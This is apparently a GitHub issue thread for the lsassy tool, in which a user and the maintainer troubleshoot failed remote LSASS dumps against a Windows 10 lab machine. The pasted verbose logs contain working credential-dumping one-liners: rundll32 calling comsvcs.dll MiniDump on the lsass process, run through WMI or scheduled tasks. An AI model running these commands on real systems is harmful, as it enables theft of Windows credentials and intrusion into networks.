### ISSUE TITLE
Protected lsass?

### ISSUE THREAD

**Issue by EasiestOdin5** [Hackndo/lsassy#48]
Probably not a bug and more likely a mis-usage of my part but I could not find much info.

I am executing the following command:
> lsassy -d SomeDomain -u SomeAdminUser -p SomePassword 10.0.2.4

But I am getting the following error:
[X] [10.0.2.4] Either lsass is protected or target might be slow or procdump/dumpert wasn't provided

Also, tried adding -m with 0-5 and providing prodump and dumpert but still getting the same error.

If I log into machine 10.0.2.4, I can dump lsass using prodump or taskmgr.

**Comment by Hackndo** [comment]
Hey there,
can you add full output using `-vv` parameter? Thanks

**Comment by EasiestOdin5** [comment]
That's a quick response 👍 Thank you.

I am getting the following message:

[*] [10.0.2.4] Authenticated
[!] [10.0.2.4] Exec method "wmi" failed.
[!] [10.0.2.4] Exec method "task" failed.
[!] [10.0.2.4] Exec method "task" failed.
[*] [10.0.2.4] Cleaning complete
[X] [10.0.2.4] Either lsass is protected or target might be slow or procdump/dumpert wasn't provided

**Comment by Hackndo** [comment]
Could you try and use v3.0.0 instead? https://github.com/Hackndo/lsassy/tree/3.0.0
Again, using `-vv` if not working. Syntax has changed a bit when using other methods than default. You can find examples here: https://github.com/Hackndo/lsassy/tree/3.0.0#examples-1

**Comment by Hackndo** [comment]
Default command line should be working though.
```
lsassy -d SomeDomain -u SomeAdminUser -p SomePassword 10.0.2.4 -vv
```

**Comment by EasiestOdin5** [comment]
When I tried lsassy on a DC (Windows Server 2019), it worked perfectly.
Also, I can execute impacket's wmiexec.py on DC but not on 10.0.2.4 (Windows 10).  So it appears that 10.0.2.4 is not configured correctly.  Is there any specific settings that need to be changed for default Windows 10 installation to make wmiexec.py to work.

Here is the result with -vv on 10.0.2.4
[*] [10.0.2.4] Authenticating against 10.0.2.4
[*] [10.0.2.4] Authenticated
[*] [10.0.2.4] Trying "dll" method
[*] [10.0.2.4] Commands : 
[*] [10.0.2.4] powershell.exe -NoP -C "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\eGsjv3u8.dmp full;Wait-Process -Id (Get-Process rundll32).id"
[*] [10.0.2.4] Trying exec method : "wmi"
[*] [10.0.2.4] Trying to authenticate using : SomeDomain\SomeAdmin:SomePassword
[+] Target system is 10.0.2.4 and isFDQN is False
[+] StringBinding: PUNISHER[49749]
[+] StringBinding: 10.0.2.4[49749]
[+] StringBinding chosen: ncacn_ip_tcp:10.0.2.4[49749]
[!] [10.0.2.4] Exec method "wmi" failed.
[*] [10.0.2.4] Error : WMIEXEC not supported on host 10.0.2.4 : Could not connect: [Errno 110] Connection timed out
[*] [10.0.2.4] Trying exec method : "task"
[*] [10.0.2.4] Register random task VNEgtRm3
[!] [10.0.2.4] Exec method "task" failed.
[*] [10.0.2.4] Error : rpc_s_access_denied
[*] [10.0.2.4] Trying "dll" method
[*] [10.0.2.4] Commands : 
[*] [10.0.2.4] cmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\eGsjv3u8.dmp full
[*] [10.0.2.4] Trying exec method : "task"
[*] [10.0.2.4] Register random task JbLyINcZ
[!] [10.0.2.4] Exec method "task" failed.
[*] [10.0.2.4] Error : rpc_s_access_denied
[*] [10.0.2.4] Closing Impacket connection
[*] [10.0.2.4] Cleaning complete
[X] [10.0.2.4] Either lsass is protected or target might be slow or procdump/dumpert wasn't provided

**Comment by Hackndo** [comment]
Ok, what account are you trying to use to do this? Is this a local account (i.e. not a domain account)?

**Comment by Hackndo** [comment]
Is it the same account you use on DC and Windows 10?

**Comment by EasiestOdin5** [comment]
Yes, same account.  DC admin.  Also, tried using local admin on 10.0.2.4 as well.
It appears to be issue on my side so I will try a fresh install of Windows 10 and see if that makes a difference.

**Comment by EasiestOdin5** [comment]
Not sure what the problem was but after setting up again, it seems to work.  Thank you .

**Comment by Hackndo** [comment]
Glad it finally worked.
